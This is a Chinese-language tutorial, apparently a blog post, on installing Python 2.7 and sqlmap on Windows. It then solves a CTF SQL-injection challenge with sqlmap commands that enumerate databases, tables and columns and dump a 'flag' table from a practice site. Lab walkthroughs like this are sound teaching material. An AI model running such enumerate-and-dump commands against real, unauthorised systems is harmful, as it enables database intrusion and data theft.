##sqlmap要在python环境下使用。且是python2.7版本(亲测3x版本sqlmap安装不成功)
一.安装python2.7
1.下载
2.安装
修改安装目录之后,点击add python.exe to path. 可以避免后面再配置环境变量。
等待安装完成。
3.测试
安装完成之后,重启电脑
打开命令提示符,输入 python,看python是否安装成功。
二.安装sqlmap
1.点击进入官网下载
2.python安装目录下新建一个文件夹并命名为sqlmap,将下载好的sqlmap安装包解压到sqlmap中
把这个文件改名为sqlmap
3.在桌面新建快捷方式,键入对象位置为 cmd ,取名为 sqlmap
选中sqlmap快捷方式右键配置sqlmap快捷方式的属性,复制sqlmap文件夹所在位置,将起始位置改为sqlmap文件所在位置,然后确定
4.测试
双击打开这个快捷方式
输入 sqlmap.py -h 如图所示即为安装成功
三.sqlmap在CTF题中的简单应用
实验吧 简单的sql注入
链接:http://ctf5.shiyanbar.com/web/index_3.php
尝试用sqlmap跑。
输入sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --dbs
//语句 --dbs #列出所有数据库
输入sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --tables -D web1
//语句 --tables -D " " #列出指定数据库中的表
输入sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --columns -T flag -D web1
//语句--columns -T "user" -D "mysql" #列出mysql数据库中的user表的所有字段
输入sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --dump -T flag -D web1
得到flag
